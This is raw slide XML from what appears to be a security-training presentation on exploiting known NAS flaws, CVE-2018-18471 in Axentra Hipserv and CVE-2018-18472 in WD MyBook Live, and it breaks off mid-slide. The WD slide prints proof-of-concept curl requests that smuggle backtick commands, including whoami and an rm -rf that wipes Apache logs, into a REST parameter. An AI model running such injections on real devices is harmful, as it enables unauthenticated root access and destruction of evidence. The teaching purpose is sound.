              <a:rPr lang="en-US" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>WizCase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> Findings – Exploring Vulnerabilities with known exploits and learning how to refine N-Days</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="72" name="Picture 71"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1301148" y="1935292"/>
            <a:ext cx="9204503" cy="1807724"/>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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="300038" y="1307307"/>
            <a:ext cx="11751467" cy="5672137"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="130615">
              <a:spcBef>
                <a:spcPts val="1440"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1940" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>CVE-2018-18471 – XXE and Unauthenticated Remote Command Execution in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1940" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Axentra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1940" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1940" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Hipserv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1940" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> NAS firmware. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1940" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>An XML External Entity (XXE) attack is a type of security vulnerability that occurs when an XML parser processes a malicious XML document containing a reference to an external entity. This can lead to various attacks, including data disclosure, denial of service, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1940" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000EE"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>server-side request forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1940" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> (SSRF) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1935" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>CVE-2018-18472 –WD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1935" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>MyBook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1935" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t> Live Unauthenticated Remote Command Execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1935" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="DejaVu Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1940" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>WD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1940" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>MyBook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1940" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t> Live and some models of WD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1940" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>MyCloud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1940" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t> NAS contain a remotely exploitable vulnerability that lets anyone run commands on the device as root. The vulnerability exists in the language change and modify functionality in the REST API, the following PoC demonstrates this flaw.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1940" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1940" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="DejaVu Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1940" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>PoC:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1940" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1940" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>curl -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1940" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>kX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1940" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t> GET -d ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1940" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>bim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1940" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>=param’ https:///panel/rest/configuration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1940" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>curl -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1940" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>kX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1940" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t> GET -d ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1940" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>bim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1940" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1940" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>param`whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1940" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>`’ https:///panel/rest/configuration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1940" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1940" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="DejaVu Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1940" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1940" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>poc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1940" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t> will create a id.txt file in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1940" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>webroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1940" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t> containing the output of the ID command. The file can be removed using:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1940" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1940" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>curl -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1940" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>kX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1940" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t> GET -d ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1940" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>bim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1940" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1940" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>param`rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1940" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t> -rf /var/apache2/logs/*`’ https:///panel/rest/configuration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1940" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1209" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="130615">
              <a:spcBef>
                <a:spcPts val="1440"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1940" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="522461">
              <a:spcBef>
                <a:spcPts val="1440"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1940" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609755" y="414198"/>
            <a:ext cx="10969994" cy="861774"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="522461" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1714"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Building </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Capabilies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> and Skills in a Safe Controlled Environment.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>“How do I exploit…. ?”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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609755" y="1604398"/>
            <a:ext cx="4590895" cy="4853552"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="130615">
              <a:spcBef>
                <a:spcPts val="1714"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Reading support forums, tech support subs, and workarounds can be invaluable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="130615">
              <a:spcBef>
                <a:spcPts val="1714"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>RESEARCH, RESEARCH, RESEARCH!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="130615">
              <a:spcBef>
                <a:spcPts val="1714"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>The bad people do.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="130615">
              <a:spcBef>
                <a:spcPts val="1714"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>One of our favorite recon / weaponization chains is to exploit the resourcefulness and documentation of IT staff and support personnel. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="130615">
              <a:spcBef>
                <a:spcPts val="1714"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>This is not complicated chaining!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="130615">
              <a:spcBef>
                <a:spcPts val="1714"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000EE"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://censys.com/blog/cve-2018-18472-western-digital-my-book-live-mass-exploitation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="242888" y="637599"/>
            <a:ext cx="11336861" cy="861774"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Rule #5 – Always improve your tradecraft. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Understand how mass exploitation occurs and why!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="78" name="Picture 77"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6095999" y="1604398"/>
            <a:ext cx="5233989" cy="4932134"/>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p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4320448" y="1570811"/>
            <a:ext cx="7871552" cy="980515"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609755" y="26053"/>
            <a:ext cx="10969994" cy="1637628"/>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Cloud Connected Devices &amp; The Downward Spiral.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="69" name="Picture 68"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8529637" y="2426443"/>
            <a:ext cx="3591244" cy="2005114"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D60B7C38-873F-8137-4842-876F20A07F31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485775" y="2650331"/>
            <a:ext cx="7400925" cy="3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WD and Seagate drives are self-registering and cloud integrated.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The devices *automatically* provisions itself, opens firewall rules, registers on a dynamic DNS network, injects NAT rules and in many cases becomes externally available. Understanding how this works and the process will teach you quite a bit about firewalls, TCP/IP, PKI, DNS, and Living off the LAN(d).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
